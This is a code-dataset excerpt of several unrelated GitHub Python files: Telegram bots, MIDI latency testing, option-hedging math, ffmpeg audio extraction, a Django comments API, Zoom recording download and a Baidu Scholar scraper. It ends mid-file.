ConversationHandler.END\r\n else:\r\n return ConversationHandler.END\r\n\r\n#/scan\r\nPICTURE=0\r\ndef scan(bot, update):\r\n cid = update.message.chat_id\r\n update.message.reply_text('Please send me a picture!')\r\n return PICTURE\r\nscan_res = []\r\ndef image_handler(bot, update):\r\n #file = bot.getFile(update.message.photo.file_id)\r\n #file_id = update.message.photo.file_id\r\n cid = update.message.chat_id\r\n file = bot.getFile(update.message.photo[-1].file_id)\r\n file.download('image.jpg')\r\n text = convert_image(\"C:/Users/justu/Desktop/H&R/image.jpg\")\r\n text= knownUser[cid].add_bulk(text)\r\n\r\n global scan_res\r\n scan_res.extend(text)\r\n\r\n res= \"\"\r\n for i in range(len(text)):\r\n res += str(i+1) + \". \" + text[i][0] + \" \\n\"\r\n bot.send_message(chat_id=cid, text= \"These items are temporary added please add a expiry date to confirm your item! \\n\" + res)\r\n return ConversationHandler.END\r\n\r\n#/addexpiry\r\nCHOOSE, ADDITEM, CHOOSE2 = range(3)\r\n\r\ndef make():\r\n list2= list(map(lambda x: x[0], scan_res))\r\n keyboard2 = [[InlineKeyboardButton(text= k, callback_data = k)] for k in list2]\r\n keyboard2.append([InlineKeyboardButton(text= \"Done\", callback_data = \"Done\")])\r\n reply_markup2 = InlineKeyboardMarkup(keyboard2)\r\n return reply_markup2\r\n\r\ndef addexpiry(bot, update):\r\n cid=update.message.chat_id\r\n bot.send_message(chat_id=cid, text= \"Please add an expiry duration!\",reply_markup= make())\r\n return CHOOSE\r\n\r\ndef choose(bot,update):\r\n cid=update.message.chat_id\r\n bot.send_message(chat_id=cid, text= \"Please add an expiry duration!\",reply_markup= make())\r\n return ADDITEM\r\n\r\ndef exp(bot, update, user_data):\r\n query = update.callback_query\r\n if query.data != \"Done\":\r\n user_data[\"fruit\"]= query.data\r\n keyboard = [[\"1\",\"2\",\"3\"],[\"4\",\"5\",\"6\"], [\"7\", \"8\", \"9\"],[\"0\",]]\r\n reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard= True, one_time_keyboard= True)\r\n bot.edit_message_text(text=\"Selected option: {}\".format(query.data),\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id)\r\n bot.send_message(chat_id=query.message.chat_id, text= \"How many days to expiry?\", reply_markup = reply_markup)\r\n return ADDITEM\r\n else:\r\n bot.send_message(chat_id=query.message.chat_id, text= \"Items have been successfully added\")\r\n return ConversationHandler.END\r\n\r\ndef newItem2(bot, update, user_data):\r\n text = update.message.text\r\n user_data['expire'] = text\r\n global scan_res\r\n for i in scan_res:\r\n if i[0] == user_data[\"fruit\"]:\r\n res=i[1]\r\n scan_res.remove(i)\r\n new= Food(user_data[\"fruit\"], int(user_data['expire']), res) #food inital\r\n cid=update.message.chat_id\r\n knownUser[cid].add_food(new) #add food to fridge\r\n bot.send_message(chat_id=cid, text= \"Item Successfully Added\")\r\n return CHOOSE2\r\n\r\ndef error(bot, update, error):\r\n logger.warning('Update \"%s\" caused error \"%s\"', update, error)\r\n\r\ndef main():\r\n \"\"\"Start the bot.\"\"\"\r\n # Create the EventHandler and pass it your bot's token.\r\n updater = Updater(\"YOUR TOKEN HERE\")\r\n j = updater.job_queue\r\n # Get the dispatcher to register handlers\r\n dp = updater.dispatcher\r\n\r\n # on different commands - answer in Telegram\r\n dp.add_handler(CommandHandler(\"start\", start))\r\n dp.add_handler(CommandHandler(\"help\", help))\r\n dp.add_handler(CommandHandler(\"display\", display))\r\n #dp.add_handler(CommandHandler(\"add\", add))\r\n #dp.add_handler(CallbackQueryHandler(button))\r\n\r\n conv_handler_add = ConversationHandler(\r\n\r\n entry_points=[CommandHandler('add', add)],\r\n\r\n states={CAT: [CallbackQueryHandler(button ,pass_user_data = True)],\r\n FOOD : [CallbackQueryHandler(button1 ,pass_user_data = True)],\r\n OTHERS: [MessageHandler(Filters.text, newItem, pass_user_data = True)],\r\n EXPIRE: [MessageHandler(Filters.text, expire, pass_user_data = True)]\r\n\r\n\r\n },\r\n\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)])\r\n\r\n dp.add_handler(conv_handler_add)\r\n\r\n conv_handler_used = ConversationHandler(\r\n\r\n entry_points=[CommandHandler('used', used)],\r\n\r\n states={USED: [CallbackQueryHandler(button2 ,pass_user_data = True)],\r\n REMOVED: [CallbackQueryHandler(remove ,pass_user_data = True)]\r\n\r\n },\r\n\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)])\r\n\r\n dp.add_handler(conv_handler_used)\r\n\r\n conv_handler_clear = ConversationHandler(\r\n\r\n entry_points=[CommandHandler('clear', clear)],\r\n\r\n states={CLEAR: [MessageHandler(Filters.text, cfm_Clear)]\r\n\r\n },\r\n\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)])\r\n\r\n dp.add_handler(conv_handler_clear)\r\n\r\n conv_handler_scan = ConversationHandler(\r\n\r\n entry_points=[CommandHandler('scan', scan)],\r\n\r\n states={PICTURE: [MessageHandler(Filters.photo, image_handler)],\r\n\r\n },\r\n\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)])\r\n\r\n dp.add_handler(conv_handler_scan)\r\n\r\n conv_handler_addexpiry = ConversationHandler(\r\n\r\n entry_points=[CommandHandler('addexpiry', addexpiry)],\r\n\r\n states={CHOOSE: [CallbackQueryHandler(exp ,pass_user_data = True)],\r\n ADDITEM:[MessageHandler(Filters.text, newItem2, pass_user_data = True)],\r\n CHOOSE2: [CallbackQueryHandler(choose ,pass_user_data = True)]\r\n\r\n },\r\n\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)])\r\n\r\n dp.add_handler(conv_handler_addexpiry)\r\n\r\n # log all errors\r\n dp.add_error_handler(error)\r\n\r\n #Schedule Jobs\r\n j.run_daily(alert, datetime.time(8,0,0))\r\n\r\n # Start the Bot\r\n updater.start_polling()\r\n\r\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\r\n # SIGTERM or SIGABRT. This should be used most of the time, since\r\n # start_polling() is non-blocking and will stop the bot gracefully.\r\n updater.idle()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"justussoh/Refrigenator","sub_path":"dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":13028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36144564480","text":"import time\n\n\nclass PerfSample:\n \"\"\"A midi cmd to be sent and a time stamp for transfer and receiption.\"\"\"\n def __init__(self, midi_cmd, delay=None):\n self.midi_cmd = midi_cmd\n self.delay = delay\n self.tx_ts = None\n self.rx_ts = None\n self.latency = None\n\n def __repr__(self):\n return \"PerfSample(%r, %r)\" % (self.midi_cmd, self.delay)\n\n def send(self, midi_out, ts):\n midi_out.send_message(self.midi_cmd)\n self.tx_ts = ts\n self.rx_ts = None\n if self.delay:\n time.sleep(self.delay)\n\n def recv(self, midi_cmd, ts):\n if midi_cmd != self.midi_cmd:\n return False\n self.rx_ts = ts\n self.latency = self.rx_ts - self.tx_ts\n return True\n\n def reset(self):\n self.tx_ts = None\n self.rx_ts = None\n self.latency = None\n\n def get_latency(self):\n return self.latency\n\n\nclass PerfBurst:\n \"\"\"Send out a set of midi commands and wait for the receiption.\"\"\"\n def __init__(self, default_delay=0):\n self.samples = []\n self.default_delay = default_delay\n self._expect_rx_pos = 0\n self._lost_samples = 0\n\n def _get_timestamp(self):\n # return value in 1ms uni\n return time.perf_counter() * 1000.0\n\n def add_sample(self, sample):\n self.samples.append(sample)\n\n def add_sample_list(self, samples):\n self.samples += list(samples)\n\n def send_samples(self, midi_out):\n self._expect_rx_pos = 0\n self._lost_samples = 0\n for sample in self.samples:\n ts = self._get_timestamp()\n sample.send(midi_out, ts)\n\n def is_done(self):\n return self._expect_rx_pos == len(self.samples)\n\n def incoming_message(self, midi_cmd):\n ts = self._get_timestamp()\n pos = self._expect_rx_pos\n n = len(self.samples)\n while pos < n:\n # found sample\n if self.samples[pos].recv(midi_cmd, ts):\n self._expect_rx_pos = pos + 1\n return True\n self._lost_samples += 1\n pos += 1\n self._expect_rx_pos = n\n return False\n\n def get_num_lost(self):\n return self._lost_samples\n\n def wait_done(self, time_out=5, time_sleep=0.1):\n start = time.perf_counter()\n delta = 0\n while delta < time_out:\n if self.is_done():\n return True\n time.sleep(time_sleep)\n delta = time.perf_counter() - start\n return False\n\n def get_latencies(self):\n result = []\n for sample in self.samples:\n latency = sample.get_latency()\n if latency:\n result.append(latency)\n return result\n\n def reset(self):\n for sample in self.samples:\n sample.reset()\n\n\ndef delay_step_generator(delay_step=10, delay=0.001):\n while True:\n if delay_step == 0:\n yield(0.0)\n else:\n for i in range(delay_step-1):\n yield(0.0)\n yield(delay)\n\n\nclass SampleGenerator:\n @staticmethod\n def note_on_sweep(start=0, end=128, step=1, velocity=42, channel=0,\n delay_step=5, delay=0.001):\n result = []\n ds = delay_step_generator(delay_step, delay)\n for note in range(start, end, step):\n cmd = [0x90 | channel, note, velocity]\n result.append(PerfSample(cmd, ds.__next__()))\n return result\n\n @staticmethod\n def note_off_sweep(start=0, end=128, step=1, velocity=42, channel=0,\n delay_step=5, delay=0.001):\n result = []\n ds = delay_step_generator(delay_step, delay)\n for note in range(start, end, step):\n cmd = [0x80 | channel, note, velocity]\n result.append(PerfSample(cmd, ds.__next__()))\n return result\n","repo_name":"cnvogelg/amiditools","sub_path":"host/amiditools/perf.py","file_name":"perf.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"9342493837","text":"import numpy as np\nimport math\nimport scipy.stats\n\ndef calculate_implied_volatility_bs(maturity, strike, spot, q, price, threshold = 0.01, initial = 0.5):\n\t'''\n\tCalculates the implied volatility of the option using the Black-Scholes formula and the\n\tNewton method.\n\t'''\n\n\n\t# Initialize\n\tsigma = initial\n\tdiff = 1\n\n\twhile diff > threshold:\n\t\t# Calculate Black-Scholes spot\n\t\td1 = (np.log(spot/strike) + (q**2 + sigma**2/2) * maturity)/(sigma*math.sqrt(maturity))\n\t\td2 = d1 - sigma * math.sqrt(maturity)\n\t\tbs = spot * scipy.stats.norm.cdf(d1) - strike * math.exp(-q * maturity) * scipy.stats.norm.cdf(d2)\n\n\t\t# First derivaive of BS w.r.t volatility\n\t\tbs_der = spot * math.sqrt(maturity) * math.exp(-d1**2 / 2) / (math.sqrt(2 * math.pi))\n\n\t\t# Calculate the volatility difference\n\t\tdiff = (price - bs) / bs_der\n\n\t\t# updaede\n\t\tsigma += diff\n\n\treturn sigma\n\ndef delta(maturity, strike, spot, q, sigma):\n\t'''\n\tCalculates the option delta (price-sensitivity)\n\t'''\n\n\t# d1 from the Black-Scholes equation\n\td1 = (np.log(spot/strike) + (q**2 + sigma**2 / 2) * maturity)/(sigma*math.sqrt(maturity))\n\n\treturn scipy.stats.norm.cdf(d1)\n\ndef vega(maturity, strike, spot, q, sigma):\n\t'''\n\tCalculates the option vega (volatility-sensitivity)\n\t'''\n\n\t# d1 from the Black-Scholes equation\n\td1 = (np.log(spot/strike) + (q**2 + sigma**2/2) * maturity) / (sigma * math.sqrt(maturity))\n\n\t# Calculate vega value\n\tvega = spot * math.exp(-d1**2 / 2)*math.sqrt(maturity) / (math.sqrt(2 * math.pi))\n\n\t# Return as fraction\n\treturn vega/100\n\ndef delta_hedge(maturity, strike, spot, q, sigma):\n\t'''\n\tReturns the amount of stock to buy (short) for any given option position to\n\tmake the position delta-neutral\n\t'''\n\n\t# Calculate delta. This is the number to short the underlying\n\tdelta_bs = delta(maturity, strike, spot, q, sigma)\n\n\treturn -delta_bs\n\ndef vega_hedge(maturity_1, maturity_2, strike, spot, q, sigma):\n\t'''\n\tReturns the multipliers on which to make the portfolio vega-neutral. We should buy\n\talpha amount of the underlying and eta amount of replicating option\n\twith a longer maturity than the original option, maturity_2 > maturity_1\n\t'''\n\n\n\t# Calculate hedged option and replication option deltas\n\tdelta_bs = delta(maturity_1, strike, spot, q, sigma)\n\tdelta_rep = delta(maturity_2, strike, spot, q, sigma)\n\n\t# Calculate hedged option and replication option vegas\n\tvega_bs = vega(maturity_1, strike, spot, q, sigma)\n\tvega_rep = vega(maturity_2, strike, spot, q, sigma)\n\n\t# Alpha is the amount of stock to hold - eta is the amount of replication stock to hold\n\talpha = -delta_bs + vega_bs / vega_rep * delta_rep\n\teta = - vega_bs / vega_rep\n\n\treturn alpha, eta\n\ndef delta_hedge_butterfly(maturity, strikes, spot, q, sigma):\n\t'''\n\tConsider you have a butterfly centered around strikes[1] with ITM and OTM call options at indexes\n\t0 and 2 respectively. This funcion returns you the total number of underlying to hedge the position.\n\t'''\n\n\t# Calculate the values\n\tlong_ITM = delta_hedge(maturity, strikes[0], spot, q, sigma)\n\tlong_OTM = delta_hedge(maturity, strikes[2], spot, q, sigma)\n\tshort_ATM = delta_hedge(maturity, strikes[1], spot, q, sigma)\n\n\treturn long_ITM + long_OTM - 2 * short_ATM\n\ndef vega_hedge_butterfly(maturity_1, maturity_2, strikes, spot, q, sigma):\n\t'''\n\tConsider you have a butterfly centered around strikes[1] with ITM and OTM call options at indexes\n\t0 and 2 respectively. This funcion returns you the total number of underlying to hedge the position\n\tfor both alpha (the underlying) and eta (repeating call of longer maturity)\n\t'''\n\n\t# Calculate the values\n\talpha_long_ITM, eta_long_ITM = vega_hedge(maturity_1, maturity_2, strikes[0], spot, q, sigma)\n\talpha_long_OTM, eta_long_OTM = vega_hedge(maturity_1, maturity_2, strikes[2], spot, q, sigma)\n\talpha_short_ATM, eta_short_ATM = vega_hedge(maturity_1, maturity_2, strikes[1], spot, q, sigma)\n\n\treturn (alpha_long_ITM + alpha_long_OTM - 2 * alpha_short_ATM), eta_long_ITM, eta_long_OTM, - 2 * eta_short_ATM","repo_name":"nnevalainen/portfolio-hedging","sub_path":"code/hedge_functions.py","file_name":"hedge_functions.py","file_ext":"py","file_size_in_byte":3956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33623445369","text":"import os\nimport subprocess\n\n\ndef remove_file_extension(filename):\n \"\"\"\n Remove the file extension from a filename using string methods.\n\n Args:\n filename (str): The input filename.\n\n Returns:\n str: The filename without the file extension.\n \"\"\"\n # Find the last occurrence of the dot (.) in the filename\n last_dot_index = filename.rfind(\".\")\n\n # Check if a dot was found and remove the extension if found\n if last_dot_index != -1:\n filename_without_extension = filename[:last_dot_index]\n return filename_without_extension\n else:\n # If no dot was found, return the original filename\n return filename\n\n\ndef extract_audio_from_video(\n video_name: str, video_dir_path: str = \"videos\", audio_out_dir: str = \"audio\"\n):\n audio_name = f\"{remove_file_extension(video_name)}.wav\"\n audio_path = os.path.join(os.getcwd(), audio_out_dir, audio_name)\n video_path = os.path.join(os.getcwd(), video_dir_path, video_name)\n # cmd = [\n # \"ffmpeg\",\n # \"-i\",\n # video_path,\n # \"-vn\",\n # \"-acodec\",\n # \"pcm_s16le\",\n # \"-ar\",\n # \"44100\",\n # \"-ac\",\n # \"2\",\n # audio_path,\n # ]\n cmd = [\n \"ffmpeg\",\n \"-i\",\n video_path,\n \"-vn\", # Disable video stream\n \"-acodec\", \"pcm_s16le\", # Set audio codec to PCM 16-bit little-endian\n \"-ar\", \"44100\", # Set audio sample rate to 44100 Hz\n \"-ac\", \"1\", # Set audio channels to mono (1 channel)\n audio_path\n]\n result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n return result.returncode\n","repo_name":"Sashi445/caption_it_flask_server","sub_path":"extract_audio.py","file_name":"extract_audio.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27494331480","text":"from rest_framework import viewsets, status, permissions\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.response import Response\nfrom .models import Comments, Item\nfrom .serializers import CommentsSerializer\nfrom django.db.models import Avg\n\n# Create your views here.\n\nfrom rest_framework import permissions\n\n\nclass IsCommentCreator(permissions.BasePermission):\n def has_object_permission(self, request, view, obj):\n # Check if the request user is the creator of the comment\n return obj.created_by == request.user.username\n\n\nclass CommentsViewSet(viewsets.ModelViewSet):\n serializer_class = CommentsSerializer\n authentication_classes = [TokenAuthentication]\n\n def get_queryset(self):\n queryset = Comments.objects.all()\n # Get the 'item_id' from the URL query parameters\n item_id = self.request.query_params.get('item_id')\n if item_id:\n queryset = queryset.filter(item_id=item_id)\n return queryset\n\n def get_permissions(self):\n if self.action == 'list' and 'item_id' in self.request.query_params:\n # Allow any user to list comments with item_id\n return [permissions.AllowAny()]\n elif self.action in ['update', 'partial_update', 'destroy']:\n # Allow only the comment's creator to update or delete\n return [IsCommentCreator()]\n elif self.action == 'create':\n # Allow any authenticated user (including admins) to create comments\n return [permissions.IsAuthenticated()]\n return [permissions.IsAuthenticated()]\n\n def perform_create(self, serializer):\n try:\n # Attempt to save the comment with created_by set to the username of the authenticated user\n serializer.save(created_by=self.request.user.username)\n\n self.update_item_average_rating(\n serializer.validated_data['item_id'].id)\n except Exception as e:\n # Handle any exceptions that may occur during the saving process\n return Response({\"message\": f\"An error occurred: {str(e)}\"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n def update(self, request, *args, **kwargs):\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n serializer = self.get_serializer(\n instance, data=request.data, partial=partial)\n\n if serializer.is_valid():\n # Only update 'comment' and 'rating' fields\n for attr, value in serializer.validated_data.items():\n if attr in ['comment', 'rating']:\n setattr(instance, attr, value)\n\n item_id = instance.item_id.id # item_id is a ForeignKey\n instance.save()\n self.update_item_average_rating(item_id)\n return Response(serializer.data)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def update_item_average_rating(self, item_id):\n # Calculate and update the average rating for the associated item\n avg_rating = Comments.objects.filter(\n item_id=item_id).aggregate(Avg('rating'))['rating__avg']\n Item.objects.filter(id=item_id).update(rating=avg_rating)\n","repo_name":"thisisankit27/Forganic-Backend","sub_path":"ecommerceBackendAPI/our_product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7564016569","text":"import inquirer\nimport main\nimport os\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\ndef mainMenu():\n clear()\n mainMenuChoices = ['All lights', 'Rooms', 'Groups', 'Sensors', 'Bridge', 'Quit']\n questions = [\n inquirer.List('Main menu',\n choices=mainMenuChoices),\n ]\n answer = inquirer.prompt(questions)\n\n if(answer['Main menu'] == 'All lights'):\n allLightsMenu()\n elif(answer['Main menu'] == 'Rooms'):\n NotImplemented\n elif(answer['Main menu'] == 'Groups'):\n NotImplemented\n elif(answer['Main menu'] == 'Sensors'):\n NotImplemented\n elif(answer['Main menu'] == 'Bridge'):\n NotImplemented\n elif(answer['Main menu'] == 'Quit'):\n exit()\n\ndef allLightsMenu():\n clear()\n questions = [\n inquirer.List('AllLightsMenu', choices=['All At Once', 'Pick Lights', 'Go back to Main menu']),\n ]\n answer = inquirer.prompt(questions)\n\n if(answer['AllLightsMenu'] == 'All At Once'):\n allLightsAtOnceMenu()\n elif(answer['AllLightsMenu'] == 'Pick Lights'):\n pickLightsMenu()\n elif(answer['AllLightsMenu'] == 'Go back to Main'):\n mainMenu()\n elif(answer['AllLightsMenu'] == 'Exit'):\n exit()\n\ndef allLightsAtOnceMenu():\n clear()\n questions = [\n inquirer.List('allAtOnce', \n choices=['Turn on', 'Turn off', 'Brightness Control', 'Go back']),\n ]\n answer = inquirer.prompt(questions)\n \n if(answer['allAtOnce'] == 'Turn on'):\n main.lightTurnOn(main.getLightByName(main.getLights()))\n elif(answer['allAtOnce'] == 'Turn off'):\n main.lightTurnOff(main.getLights())\n elif(answer['allAtOnce'] == 'Brightness Control'):\n # brightnessControlMenu()\n NotImplemented\n elif(answer['allAtOnce'] == 'Go back'):\n mainMenu()\n elif(answer['allAtOnce'] == 'Exit'):\n exit()\n \ndef pickLightsMenu():\n clear()\n questions = [\n inquirer.Checkbox('PickLightsMenu',\n 'Select the lights you want to control', choices=main.getAllLightsNames()),\n ]\n\n answers = inquirer.prompt(questions)\n\n lightsControl(answers['PickLightsMenu']) \n\ndef lightsControl(chosenLightNames):\n clear()\n possibleChoices = ['Turn on', 'Turn off', 'Brightness Control']\n if(main.areAllColor(chosenLightNames)):\n possibleChoices.append('Color Control')\n possibleChoices.append('Main menu')\n possibleChoices.append('Exit')\n\n questions = [\n inquirer.List('lightsControl', choices=possibleChoices), \n ]\n answer = inquirer.prompt(questions)\n\n if(answer['lightsControl'] == 'Turn on'):\n main.lightTurnOn(main.getLightByName(chosenLightNames))\n elif(answer['lightsControl'] == 'Turn off'):\n main.lightTurnOff(main.getLightByName(chosenLightNames))\n elif(answer['lightsControl'] == 'Brightness Control'):\n # brightnessControlMenu()\n NotImplemented\n elif(answer['lightsControl'] == 'Color Control'):\n #colorControlMenu()\n NotImplemented\n elif(answer['lightsControl'] == 'Main menu'):\n mainMenu()\n elif(answer['lightsControl'] == 'Exit'):\n exit()\n\ndef colorControlMenu():\n NotImplemented\ndef brightnessControlMenu():\n NotImplemented\n\n\n\n\nmainMenu()\n\n","repo_name":"Unintendedsideeffects/Krill","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"46794704690","text":"import requests \nimport datetime\n\n# Put your JWT token that you get from https://marketplace.zoom.us/ here. \nJWT = '##########'\n\n# Put your USER ID that you get from the API. \nUSERID = '##########'\n\n\nheaders = {\n\t\t'Authorization': \n\t\t'Bearer {}'.format(JWT),\n\t\t'content-type':\n\t\t'application/json',\n\t}\n\n# Put your own download path here, I used an external hard drive so mine will differ from yours\nPATH = '/Volumes/Ext3/Zoom/'\n\n\n\ndef main():\n\tfor year in range(2018,2022):\n\t\tfor month in range(1,13):\n\t\t\tnext_month = month + 1\n\t\t\tnext_year = year\n\n\t\t\tif month == 12:\n\t\t\t\tnext_month = 1\n\t\t\t\tnext_year = year + 1\n\n\t\t\tstart_date = datetime.datetime(year,month,1)\n\t\t\tnext_date = datetime.datetime(next_year,next_month,1)\n\n\t\t\tget_recording(start_date, next_date)\n\n\ndef get_recording(start_date, next_date):\n\t\n\tdate_string = '%Y-%m-%d'\n\turl = 'https://api.zoom.us/v2/users/{}/recordings?from={}&to={}&page_size=300&'.format(\n\t\t\t\tUSERID,\n\t\t\t\tstart_date.strftime(date_string),\n\t\t\t\tnext_date.strftime(date_string)\n\t\t\t)\n\n\tprint(url)\n\n\tresponse = requests.get(\n\t\turl,\n\t\theaders=headers\n\t)\n\n\tdata = response.json()\n\t# print('page_count: ', data['page_count'])\n\t# print('page_size: ', data['page_size'])\n\t# print(len(data['meetings']))\n\t# print(data['from'])\n\t# print(data['to'])\n\n\tfor meeting in data['meetings']:\n\t\tfor record in meeting['recording_files']:\n\t\t\tif record['status'] != 'completed':\n\t\t\t\tcontinue\n\n\t\t\tdownload_recording(\n\t\t\t\trecord['download_url'], \n\t\t\t\trecord['recording_start'].replace(':','-')\n\t\t\t)\n\n\ndef download_recording(download_url, filename):\n\tprint(download_url)\n\tdownload_access_url = '{}?access_token={}'.format(download_url, JWT)\n\tprint(download_access_url)\n\tresponse = requests.get(download_access_url, stream=True)\n\tlocal_filename = '{}{}.mp4'.format(PATH, filename)\n\n\twith open(local_filename, 'wb') as f:\n\t\tfor chunk in response.iter_content(chunk_size=8192):\n\t\t\tprint (len(chunk))\n\t\t\tf.write(chunk)\n\n\t \nif __name__ == '__main__':\n\tmain()\n\n\n\n\n","repo_name":"StackJonSnowy/lanecu","sub_path":"cloudlink.py","file_name":"cloudlink.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2788346502","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nfrom selenium import webdriver\r\nimport json\r\ndef get_url_lists(soup):\r\n #单页面\r\n c_fonts = soup.find_all(\"h3\", class_=\"t c_font\")\r\n url_list=[]\r\n for c_font in c_fonts:\r\n url = \" http://\" + c_font.find(\"a\").attrs[\"href\"][2:]\r\n print(url)\r\n url_list.append(url)\r\n return url_list\r\ndef parase_one(url):\r\n result = dict()\r\n content_details = requests.get(url)\r\n soup_new = BeautifulSoup(content_details.text, \"lxml\")\r\n try :\r\n result['title']=''.join(list(soup_new.select('#dtl_l > div > h3 > a')[0].stripped_strings))\r\n result['abstract']=soup_new.find_all(\"p\",class_=\"abstract\")[0].get_text().strip()\r\n result[\"author\"]=soup.find_all(\"p\", class_=\"author_text\")[0].get_text().strip()\r\n keywords=soup_new.find_all(\"p\",class_=\"kw_main\")\r\n if len(keywords) == 0 :\r\n keywords = soup_new.find_all(\"p\", class_=\"kw_main_s\")\r\n result['keywords']=list(keywords[0].stripped_strings)\r\n except IndexError:\r\n return result\r\n\r\n print(result)\r\n\r\n\r\ndef page_url_list(soup, page=0):\r\n print(soup.find_all(\"a\", class_=\"n\")[0][\"href\"])\r\n fir_page = \"http://xueshu.baidu.com\" + soup.find_all(\"a\", class_=\"n\")[0][\"href\"]\r\n url_lists = []\r\n for i in range(page):\r\n next_page = fir_page.replace(\"pn=10\", \"pn={:d}\".format(i * 10))\r\n response = requests.get(next_page)\r\n soup_new = BeautifulSoup(response.text, \"lxml\")\r\n url_lists=url_lists+get_url_lists(soup_new)\r\n\r\n return url_lists\r\ndef driver_open(key_word):\r\n url = \"http://xueshu.baidu.com/\"\r\n driver = webdriver.Chrome(\"D:\\chromedriver_win32\\chromedriver.exe\")\r\n# driver = webdriver.Chrome(\"D:\\\\Program Files\\\\selenium_driver\\\\chromedriver.exe\")\r\n driver.get(url)\r\n # time.sleep(10)\r\n driver.find_element_by_class_name('s_ipt').send_keys(key_word)\r\n # time.sleep(2)\r\n driver.find_element_by_class_name('s_btn_wr').click()\r\n # time.sleep(2)\r\n content = driver.page_source.encode('utf-8')\r\n driver.close()\r\n soup = BeautifulSoup(content, 'lxml')\r\n # with open(\"1.html\",\"w\",encoding=\"utf-8\") as f:\r\n # f.write(str(soup.contents))\r\n # print(soup.contents)\r\n return soup\r\n\r\nsoup=driver_open(\"机器学习\")\r\nurl_lists= page_url_list(soup,3)\r\nwith open(\"url_lists.txt\",\"w\",encoding=\"utf-8\") as f:\r\n for i in url_lists:\r\n f.write(str(i)+\"\\n\")\r\nresult =list()\r\nf= open(\"result.json\",\"w\",encoding=\"utf-8\")\r\nfor url in url_lists:\r\n t = parase_one(url)\r\n print(t)\r\n if t!=None:\r\n result.append(t)\r\njson.dump(result,f)\r\n\r\n","repo_name":"zplovekq/BaiduXueSuSpiderAndSearch","sub_path":"UnioTest.py","file_name":"UnioTest.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16917759890","text":"from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove\nfrom telegram.update import Update\nfrom telegram.utils.promise import Promise\nfrom telegram.ext import (\n Updater, ConversationHandler, CommandHandler, MessageHandler, Filters, RegexHandler,\n Job\n)\nimport logging\nfrom .analyze_photo import analyze_photo\n\nfrom .settings import MIN_FRIEND_COUNT, TOKEN\nimport os\nfrom datetime import timedelta\nfrom api.get_score import browser_history_score_info, twitter_score_info, detect_depression\nfrom .quest import *\nfrom collections import namedtuple\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"backend.settings\")\nimport django\ndjango.setup()\nfrom api.models import User\nUrl = namedtuple('Url', ['url', 'ts'])\n\n\ndef correct_username(username):\n if username[0] != '@':\n return '@' + username\n\n\ndef get_urls():\n return [\n Url(\n url='https://www.google.es/search?hl=ru&source=hp&ei=yqjLW4bvCYPqrgSNrLL4CA&oq='\n 'i+love+my+mom&q=i+wanna+dance&gs_l='\n 'psy-ab.3..33i160k1l2.78913.95588.0.97926.37.32.4.1.1.0.138.3109.16j15.31.0'\n '....0...1c.1.64.psy-ab..1.35.3014...0j0i22i30k1j0i19k1j0i22i30i19k1j33i22i'\n '29i30k1j33i21k1.0.Qpf975be7AE',\n ts=1540048662161.8308\n ),\n Url(\n url='https://www.google.es/search?hl=ru&source=hp&ei=yqjLW4bvCYPqrgSNrLL4CA&q='\n 'i+love+my+life&oq=i+wanna+dance&gs_l='\n 'psy-ab.3..33i160k1l2.78913.95588.0.97926.37.32.4.1.1.0.138.3109.16j15.31.0'\n '....0...1c.1.64.psy-ab..1.35.3014...0j0i22i30k1j0i19k1j0i22i30i19k1j33i22i'\n '29i30k1j33i21k1.0.Qpf975be7AE',\n ts=1540048662161.8308\n ),\n Url(\n url='https://www.google.es/search?hl=ru&source=hp&ei=yqjLW4bvCYPqrgSNrLL4CA&q='\n 'i+love+my+mom&oq=i+wanna+dance+with+somebody+and+be+happy+I+happy&gs_l='\n 'psy-ab.3..33i160k1l2.78913.95588.0.97926.37.32.4.1.1.0.138.3109.16j15.31.0'\n '....0...1c.1.64.psy-ab..1.35.3014...0j0i22i30k1j0i19k1j0i22i30i19k1j33i22i'\n '29i30k1j33i21k1.0.Qpf975be7AE',\n ts=1540048662161.8308\n ),\n Url(\n url='https://www.charliechaplin.com/it/articles/42-Smile-Lyrics',\n ts=1540148662161.8308\n ),\n Url(url='https://en.wikipedia.org/wiki/Happiness', ts=1540047662161.8308),\n Url(url='https://en.wikipedia.org/wiki/Lions', ts=1540047362161.8308),\n Url(url='https://en.wikipedia.org/wiki/Sadness', ts=1540047962161.8308),\n ]\n\n\nMY_URL = 